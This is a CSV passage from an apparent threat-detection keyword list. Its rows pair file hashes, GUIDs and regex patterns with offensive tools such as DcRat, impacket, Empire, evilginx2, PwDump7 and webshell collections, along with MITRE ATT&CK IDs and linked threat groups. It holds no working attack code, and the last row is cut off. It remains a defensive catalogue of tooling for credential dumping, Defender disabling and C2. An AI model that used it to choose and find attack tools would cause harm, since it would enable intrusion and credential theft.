"*EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3*",".{0,1000}EE03FAA9\-C9E8\-4766\-BD4E\-5CD54C7F13D3.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","42851" "*ee0833e987b03dea01e4261379eab657b48ee2d91e904e079497e263da68a1e1*",".{0,1000}ee0833e987b03dea01e4261379eab657b48ee2d91e904e079497e263da68a1e1.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","42853" "*ee09435faed339e34600ff9b157cbcedec2fdedcf6e20b058acd162eb720da1d*",".{0,1000}ee09435faed339e34600ff9b157cbcedec2fdedcf6e20b058acd162eb720da1d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42855" "*ee09b69221509034225e37497bc6bc00498fa914adb00b0fad89b39443a70db6*",".{0,1000}ee09b69221509034225e37497bc6bc00498fa914adb00b0fad89b39443a70db6.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","42856" 
"*ee0ef3b713324cc7b0d6406c194c4e563fdcbcdea330300844e30603969cbde3*",".{0,1000}ee0ef3b713324cc7b0d6406c194c4e563fdcbcdea330300844e30603969cbde3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42857" "*ee18de5f0cb000c4b6aaedcfc8fb2f402d45d4f70d5cb87db2d7232b3cd3c204*",".{0,1000}ee18de5f0cb000c4b6aaedcfc8fb2f402d45d4f70d5cb87db2d7232b3cd3c204.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42858" "*ee21ea772594f2e49cabc02176dd935af45c0573a90ff3b10957a4f98c804e37*",".{0,1000}ee21ea772594f2e49cabc02176dd935af45c0573a90ff3b10957a4f98c804e37.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","42859" "*ee229f4fa581d63bf7bdf8688a0b6386e3b01bb107165fd30df7c573897a094e*",".{0,1000}ee229f4fa581d63bf7bdf8688a0b6386e3b01bb107165fd30df7c573897a094e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN 
interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42860" "*ee27cb1d6e87e293f1fa91adb5870328890990e941d1fabe5cb4565fb4795a21*",".{0,1000}ee27cb1d6e87e293f1fa91adb5870328890990e941d1fabe5cb4565fb4795a21.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","42861" "*ee29b50f82ac78854af1e014fe9986a9699f98683ca798092f6b51282c08d640*",".{0,1000}ee29b50f82ac78854af1e014fe9986a9699f98683ca798092f6b51282c08d640.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","42862" 
"*ee29e80a2e8c469655fe215eac14c2fbb201116e40fd056dcd1f602e1959263b*",".{0,1000}ee29e80a2e8c469655fe215eac14c2fbb201116e40fd056dcd1f602e1959263b.{0,1000}","offensive_tool_keyword","PwDump7","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.openwall.com/passwords/windows-pwdump","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","42863" "*ee2b096fee2d9337ce5b2e1506ffdae090833eefc634b73f22046679de392f05*",".{0,1000}ee2b096fee2d9337ce5b2e1506ffdae090833eefc634b73f22046679de392f05.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","42864" "*ee2f6d712d46999e0a71694fbb8eb206c4d6555e187ab4f70257c83446091355*",".{0,1000}ee2f6d712d46999e0a71694fbb8eb206c4d6555e187ab4f70257c83446091355.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42866" "*ee30d8fb660ce3a25a8664c6214f2766a7099bdd78392009d961d22b7fd3ded2*",".{0,1000}ee30d8fb660ce3a25a8664c6214f2766a7099bdd78392009d961d22b7fd3ded2.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS 
process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#filehash","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","42867" "*ee4039b4d2aede8f5f64478bc59faac86036796be24dea8dc18f009fb0905e4a*",".{0,1000}ee4039b4d2aede8f5f64478bc59faac86036796be24dea8dc18f009fb0905e4a.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","42873" "*ee58b36f91a49518422e7eab0fd0c82c9a154f95ae9dde863a02bc4da7ff398c*",".{0,1000}ee58b36f91a49518422e7eab0fd0c82c9a154f95ae9dde863a02bc4da7ff398c.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - 
T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","42876" "*ee604522baa122ca8384531d4d8df1014023d871f1d2fc4b53de17cc6d5d4acf*",".{0,1000}ee604522baa122ca8384531d4d8df1014023d871f1d2fc4b53de17cc6d5d4acf.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","42880" "*EE64B207-D973-489B-84A8-B718B93E039B*",".{0,1000}EE64B207\-D973\-489B\-84A8\-B718B93E039B.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation 
tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","42882" "*ee6603f8abadc1b575b6c696caf487da5421ad772cf65b38f49c35630d34f09b*",".{0,1000}ee6603f8abadc1b575b6c696caf487da5421ad772cf65b38f49c35630d34f09b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42883" "*EE666120-EE4C-4D91-A545-66BEAA1830C1*",".{0,1000}EE666120\-EE4C\-4D91\-A545\-66BEAA1830C1.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#GUIDproject","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","42884" "*ee672f25cde5ed8535ced1702d50a0fa42e229a6ee959f83c96c97b1cf0042a7*",".{0,1000}ee672f25cde5ed8535ced1702d50a0fa42e229a6ee959f83c96c97b1cf0042a7.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","42885" "*ee68d7deb7cefdfca66c078d6036d7aa3aa7afcc62b282999034b4a1faed890d*",".{0,1000}ee68d7deb7cefdfca66c078d6036d7aa3aa7afcc62b282999034b4a1faed890d.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - 
T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","42886" "*EE728741-4BD4-4F7C-8E41-B8328706EA84*",".{0,1000}EE728741\-4BD4\-4F7C\-8E41\-B8328706EA84.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","#GUIDproject","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","42887" "*ee7eb509d6e06bd0c51c1d0bf2a03bde2c167fb002dd6d7a842ba209f742e90e*",".{0,1000}ee7eb509d6e06bd0c51c1d0bf2a03bde2c167fb002dd6d7a842ba209f742e90e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42889" "*ee8088715ef996a3be6d9b935086527556473825d7908573853c1ccd8aa8b26d*",".{0,1000}ee8088715ef996a3be6d9b935086527556473825d7908573853c1ccd8aa8b26d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42890" "*ee85ccadc62f1fac243dec2da0ff38e21629cd84d56c500eab76e329cd48be61*",".{0,1000}ee85ccadc62f1fac243dec2da0ff38e21629cd84d56c500eab76e329cd48be61.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42892" "*ee9f3bc75013e6741dde950888676f9c20134ed7a7607bd069da81727be1fa01*",".{0,1000}ee9f3bc75013e6741dde950888676f9c20134ed7a7607bd069da81727be1fa01.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42896" "*eea432f6f16df3514a6310b593ea8676d2330310d9181cda1e7c278ad53758b3*",".{0,1000}eea432f6f16df3514a6310b593ea8676d2330310d9181cda1e7c278ad53758b3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42897" "*eead28e2afe2070b6a3f40d874c53870b13c705e90cb60520f3f52aca2ad8cf8*",".{0,1000}eead28e2afe2070b6a3f40d874c53870b13c705e90cb60520f3f52aca2ad8cf8.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","42898" "*eeb9847bbb8fdb98a1454e6dcde4e4e685bf549e0ab42fab823ed5abf83de427*",".{0,1000}eeb9847bbb8fdb98a1454e6dcde4e4e685bf549e0ab42fab823ed5abf83de427.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42901" "*eeba4c8ec806378fecc51fb7ffe3b48c5fa57108330b822043494cc4cea99d89*",".{0,1000}eeba4c8ec806378fecc51fb7ffe3b48c5fa57108330b822043494cc4cea99d89.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","42902" "*EEC35BCF-E990-4260-828D-2B4F9AC97269*",".{0,1000}EEC35BCF\-E990\-4260\-828D\-2B4F9AC97269.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 
- TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","#GUIDproject","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","42903" "*EEC48565-5B42-491A-8BBB-16AC0C40C367*",".{0,1000}EEC48565\-5B42\-491A\-8BBB\-16AC0C40C367.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","#GUIDproject","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","42904" "*eec5232b43748fc0c8a86e2b3e7b921e88b9aa0275a0ad3b4f719f8e468b1f95*",".{0,1000}eec5232b43748fc0c8a86e2b3e7b921e88b9aa0275a0ad3b4f719f8e468b1f95.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","42905" "*eec9b210d157d0ef16e7238c21bf66c6dd4806471853c3e976927f7be14ab918*",".{0,1000}eec9b210d157d0ef16e7238c21bf66c6dd4806471853c3e976927f7be14ab918.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42906" "*eed0e9350a87338b0cb8e78ea1bffc7d3c08ae221de88a3c94dc0eac0a456fe5*",".{0,1000}eed0e9350a87338b0cb8e78ea1bffc7d3c08ae221de88a3c94dc0eac0a456fe5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - 
TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42907" "*eed708f857797ce9ef61fe053a59ec41b0b96283702e5e23453c2a387c1bd8f7*",".{0,1000}eed708f857797ce9ef61fe053a59ec41b0b96283702e5e23453c2a387c1bd8f7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42908" "*eedd5f237d110c97db52b4b3970fe3b09453120d2efcc8f6fc0291846c25edec*",".{0,1000}eedd5f237d110c97db52b4b3970fe3b09453120d2efcc8f6fc0291846c25edec.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42911" "*eee3c34bbbc0f04309c2faec56793615c2811e2ac00f6819399edd7628386411*",".{0,1000}eee3c34bbbc0f04309c2faec56793615c2811e2ac00f6819399edd7628386411.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","42915" "*eee4a896d177f5b562ac78c7e655429a1da46fb00307d9100f63d771c32297f2*",".{0,1000}eee4a896d177f5b562ac78c7e655429a1da46fb00307d9100f63d771c32297f2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42916" "*eeebce1a4c3e05e21689acef000a5fcf0f17abc3*",".{0,1000}eeebce1a4c3e05e21689acef000a5fcf0f17abc3.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","42917" "*eef2ceac990c985faaa8e869e66e47652863bd94a14a87de4245996111717326*",".{0,1000}eef2ceac990c985faaa8e869e66e47652863bd94a14a87de4245996111717326.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","42919" "*eeriedusk/nysm*",".{0,1000}eeriedusk\/nysm.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - 
T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","1","N/A","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","42921" "*ef012e22ef53045f48b574b395788c8639f853484bd78f4c9ad63532d916c1f9*",".{0,1000}ef012e22ef53045f48b574b395788c8639f853484bd78f4c9ad63532d916c1f9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42922" "*ef0602ea7c5cfe523cd58fbfb20f835a908c5d3873fcb14510a042d13de53863*",".{0,1000}ef0602ea7c5cfe523cd58fbfb20f835a908c5d3873fcb14510a042d13de53863.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","42923" "*ef06984084cb323bc4a055076b4817a9f69d4914707030daa0374a059e4ffe37*",".{0,1000}ef06984084cb323bc4a055076b4817a9f69d4914707030daa0374a059e4ffe37.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42924" 
"*ef0a2554636103e9c7ff1590aebf1eaa2c41265092f20598e67c8ef0dd168379*",".{0,1000}ef0a2554636103e9c7ff1590aebf1eaa2c41265092f20598e67c8ef0dd168379.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42925" "*ef105cd1be00cf14b44173895a2610f5e5ed4d06390494be20bf7175215ea851*",".{0,1000}ef105cd1be00cf14b44173895a2610f5e5ed4d06390494be20bf7175215ea851.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - 